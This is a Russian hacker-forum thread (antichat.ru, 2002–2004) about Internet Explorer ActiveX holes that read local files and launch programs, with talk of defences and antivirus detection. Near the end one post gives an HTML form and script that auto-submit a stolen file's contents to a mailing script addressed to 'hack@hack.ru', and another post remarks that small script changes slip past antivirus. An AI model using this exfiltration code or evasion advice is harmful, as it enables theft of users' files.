Вот накатал тут статью http://antichat.ru/activex

Прочел.
И сразу же вазникли вапросы:
1) Можно ли таким образом мутить файлы у юзера(*.pwl)
2) Возможно ли от этой фигни как нибудь защитится, кроме как блоком всех аплетов

1)можно
2)Точно не знаю. Знаю лишь то что если ОС имеет уязвимость,то не помогает даже высокий кровень безопасности в настройках юзера. Только разве что полностью отключить ActiveX. Другой выход - поставить NT 2000 или XP. Там работает только уязвимость с запуском программы у клиента. Уязвимость с заменой CLSID кажись не работает...

тож прочёл..
карочи, если про секьюрити - то нада отрубать activeX и scripting, што я давно уже сделал http://forum.antichat.ru/iB_html/non-cgi/emoticons/smile.gif, хатя... ну кайфа ж никакова: от половины сайтов отдыхаю.
ну а если применять описанный метод, чего мы (как и автор в эпиграфе) делать, кнешна, не будим http://forum.antichat.ru/iB_html/non-cgi/emoticons/smile.gif http://forum.antichat.ru/iB_html/non-cgi/emoticons/wink.gif, то мне кажеца статистика показала б чуть ли не 99% , потому што в настройках бедных осликов IE большинство юзеров ограничиваются лишь выставлением высокого левела безопасности. и всё. а это ж не блокирует работу аплетов, эл. управления etc.

хех, Алгол, я дальше третьего демо не пошёл http://forum.antichat.ru/iB_html/non-cgi/emoticons/sad.gif)..ну его нах http://forum.antichat.ru/iB_html/non-cgi/emoticons/smile.gif хотя я тебе и верю http://forum.antichat.ru/iB_html/non-cgi/emoticons/smile.gif
на третьем, правда, антивурус успевает мне выдать подозревалку на Exploit.CodeBase..тырыпыры..
то исть типа содержание кода использующего дыру.

а калькулятор, сабака, так и не запустился %)) . не было там иво ваабще у миня,я в уме считаю (ржу)

вобщим, очинь нужная статейка.

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (decadancer @ октября 29 2002,17:24)</td></tr><tr><td id="QUOTE">хех, Алгол, я дальше третьего демо не пошёл http://forum.antichat.ru/iB_html/non-cgi/emoticons/sad.gif)..ну его нах http://forum.antichat.ru/iB_html/non-cgi/emoticons/smile.gif хотя я тебе и верю http://forum.antichat.ru/iB_html/non-cgi/emoticons/smile.gif
на третьем, правда, антивурус успевает мне выдать подозревалку на Exploit.CodeBase..тырыпыры..
то исть типа содержание кода использующего дыру.[/QUOTE]<span id='postcolor'>
Говорят (я правда сам не видел, бо антивиры принципиально не юзаю) что и на demo5 ругается , пишет шо энта JS.Trojan.Seeker. Но самое смешное то , что самые опасные три последних примера. А на них AVP - ноль внимания....

исчо можна файрволом блокировать... я так и делаю, ну его нах.. этот браузер... где гарантия, шо нет дыры, позволяющей без ведома юзверя выполнять какие-то скрыпты.. даже с запретом их выполнения!

А вот тут вы батенька ошибаетесь... Файрволу глубоко наплевать что находится на странице... его дело - порты, а с портами тут все окей...все тихо мирно скачивается по 80-му &nbsp;http://forum.antichat.ru/iB_html/non-cgi/emoticons/biggrin.gif
to Dj Skeleton™
а тебе лично, по старой дружбе, на ухо могу сказать шо твоя 98-шка дырявая... в ней уязвимость подмены CLSID присутствует ...

ну канешна, причём тут файервол.

to Алгол: а вот в чём принципиальность не юзанья антивира http://forum.antichat.ru/iB_html/non-cgi/emoticons/confused.gif &nbsp;http://forum.antichat.ru/iB_html/non-cgi/emoticons/smile.gif

хотя.. ээ.. я тут подумал, Алгол: ну допустим, файервол не отреагирует как на атаку, но по объёму исходящего ты же будешь видеть, что качается што-то большое у тебя. и заинтересуешься - что и через какой порт. ... или я не прав?

хех.. можит и мне по секрету чиво скажешь на ушко? http://forum.antichat.ru/iB_html/non-cgi/emoticons/biggrin.gif
а лучше - на мыло &nbsp;http://forum.antichat.ru/iB_html/non-cgi/emoticons/tounge.gif .. если есть время, канешна...

гхм.. ну ладно, прогнал я...
а как насчет прокси? если поставить че-нить типа wingate? или посторонними прогами никак не повлиять, только в конфиге браузера..

про дырки я знаю, калькулятор даж запускается!.. http://forum.antichat.ru/iB_html/non-cgi/emoticons/wink.gif тока вот не лежит у меня душа к XP!.. Можь следующую операционку удобней сделают!..

to decadancer
Антивир не юзаю по причине резкого сижения быстродействия при его использовании. А кроме того небольшая модификация скрипта - и каспер уже не ругается (это я про demo5)...
Насчет объема пердаваемых данных: Ну представь себе , сидит непродвинутый юзер в чате.... Он шо, видит что там качается ?? Он разве может оценить объем передаваемых данных ?? Ведь у него голяк, никаких naviscope и никаких A4 нету.... А сидит он в чате долго...за это время мноога чего интресного можна утырить....
А с виндой у тя вроде все ок...

to Dj Skeleton™
Wingate тож не поможет...
Правда я однажды видел что некий промежуточный файрвол завернул пакет.... Но это исключение... Файрвол видно дюже умный был...на лету анализировал содержимое скриптов....

аха, я потом сам додумал: распознать объём нереально, если где-то долго сидишь, ведь и качается через тот же самый порт, порт браузера.. если б другой какой - тогда уж можно было заподозрить, шо это за соединение...
вот это трава некошенная для действийhttp://forum.antichat.ru/iB_html/non-cgi/emoticons/wink.gif
реально одна из самых серьёзных штук.
ну не считая всяких других непропатченых (и пропатченых http://forum.antichat.ru/iB_html/non-cgi/emoticons/smile.gif) дыр у IE, как я недавно прочёл, аж прозрел: про встроенную в эксплоэр радио-систему, о которой мы все знаем, и заместо которой можно запустить чё угодно своё,..типа когда урл с музычкой не найден, остаётся кусок кода, который запускается.. например, format/ - тьху-3 р. ))
И последний монстр-патч в 1.5 мегабайта ни фига не памагает....

а за винду - эт ты меня обнадежил ).. очинь надеюсь, шо у тя не хватит времени и желания когда-нить меня разочаровать в обратном http://forum.antichat.ru/iB_html/non-cgi/emoticons/wink.gif

всем - приятного пива..тьху ты.. выходных тоисть трезвых..)

мораль - юзайте оперу

кхм кхм... мне промолчать про оперу иль шо нить сказать ?? http://forum.antichat.ru/iB_html/non-cgi/emoticons/smile.gif

У меня вопрос(ы) http://forum.antichat.ru/iB_html/non-cgi/emoticons/smile.gif Конкретно по 8-ой демке...
Вот XP ее действительно не пропустилоhttp://forum.antichat.ru/iB_html/non-cgi/emoticons/sad.gif )) ну да ладно.. поверим Алголу, что в 98 все окhttp://forum.antichat.ru/iB_html/non-cgi/emoticons/smile.gif (93%)
Вот ты еще пишешь - &quot;Прочитанное содержимое файла может быть без труда отправлено на другой сервер&quot; а каким образом? а на мыло может быть отправлено?

Хм... очень просто может быть отправлено... Через форму. Например вот так:
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>HTML </td></tr><tr><td id="CODE"><span style='color:#333333'>
&lt;<span style='color:blue'>form</span> action=&quot;<span style='color:orange'>http://antichat.ru/cgi-bin/send.pl</span>&quot; method=&quot;<span style='color:orange'>post</span>&quot; id=&quot;<span style='color:orange'>sendForm</span>&quot;&gt;
&lt;<span style='color:blue'>input</span> name=&quot;<span style='color:orange'>to</span>&quot; type=&quot;<span style='color:orange'>hidden</span>&quot; value=&quot;<span style='color:orange'>hack@hack.ru</span>&quot;&gt;
&lt;<span style='color:blue'>textarea</span> id=&quot;<span style='color:orange'>textfile</span>&quot; name=&quot;<span style='color:orange'>textfile</span>&quot;&gt;&lt;/<span style='color:blue'>textarea</span>&gt;
&lt;/<span style='color:blue'>form</span>&gt;

#60;script&gt;
//запихиваем содержимое файла Text в поле формы
textfile.value:=Text;
//отправляем форму скрипту send.pl, который затем отсылает на почту hack@hack.ru
sendForm.submit();
&lt;/<span style='color:blue'>script</span>&gt;
</span>[/QUOTE]<span id='postcolor'>

Замыльте, плиз, исходник send.pl или какой-нибудь другой скрипт для отправления данных из формы на емайл. есть ли такое на javascript, без перла/пхп? естественно без использования &quot;mailto:&quot;.

intruder666coбакаfromru.com &lt;- скрипт или ссылку на него

Заранее спасибо!

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Guest @ января 08 2004,05:04)</td></tr><tr><td id="QUOTE">скрипт для отправления данных из формы на емайл. есть ли такое на javascript, без перла/пхп? естественно без использования &quot;mailto:&quot;.[/QUOTE]<span id='postcolor'>
Нет такого... Для того что бы послать мыло, нужен почтовый клиент, кторый работает по SMTP. А браузер по этому протоколу не работает, значит обязательно нужна внешняя программа (на перле, пхп и т.п.)

В других браузерах это не пройдет... Там актив икс вообще отсутствует...